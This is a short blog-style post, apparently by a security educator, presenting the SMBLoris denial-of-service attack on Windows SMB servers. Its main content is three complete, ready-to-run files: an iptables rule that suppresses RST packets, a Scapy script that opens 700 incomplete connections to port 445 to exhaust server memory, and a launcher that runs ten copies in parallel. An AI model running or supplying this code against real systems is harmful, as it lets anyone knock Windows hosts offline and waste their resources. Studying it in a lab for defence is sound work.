SMBLoris Attack

This attack consumes resources on a Windows target and slows it down. I've even permanantly broken two of my test virtual machines, so they cannot make any network connections.

Here's a video showing the attack:

Code

Here is the code I used in the video above. There are three files. They all run on Kali 2 with no added software.

rst

This script adjusts the firewall to block outgoing RST packets, which the OS sends because it doesn't recognize the raw packets sent by Scapy.
#!/bin/bash

iptables -F
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

smb3.py

This script makes 700 connections to port 445, adding these four bytes to the payload of the final ACK:
'\x00\x01\xff\xff'
Those bytes begin a SMB request, causing the server to reserve 128 KB of RAM. The request is never completed, so RAM is wasted on the server.
from scapy.all import *
import sys

p0 = int(sys.argv[1])

conf.L3socket
conf.L3socket=L3RawSocket

i = IP()
i.dst = "172.16.1.186"
t = TCP()
t.dport = 445

for p in range(p0, p0+700):
  print p
  t.sport = p
  t.flags = "S"

  r = sr1(i/t)
  rt = r[TCP]
  t.ack = rt.seq + 1
  t.seq = rt.ack
  t.flags = "A"
  sbss = '\x00\x01\xff\xff'
  send(i/t/sbss)

run10

This script runs 10 threads to make the attack faster.
#!/bin/bash
python smb3.py 0 &
python smb3.py 1000 &
python smb3.py 2000 &
python smb3.py 3000 &
python smb3.py 4000 &
python smb3.py 5000 &
python smb3.py 6000 &
python smb3.py 7000 &
python smb3.py 8000 &
python smb3.py 9000 &

Original Tweets

These are the Tweets that explain how the attack works.

Read from bottom to top.


Posted 7-31-17 by Sam Bowne
Revised with code and video 8-2-17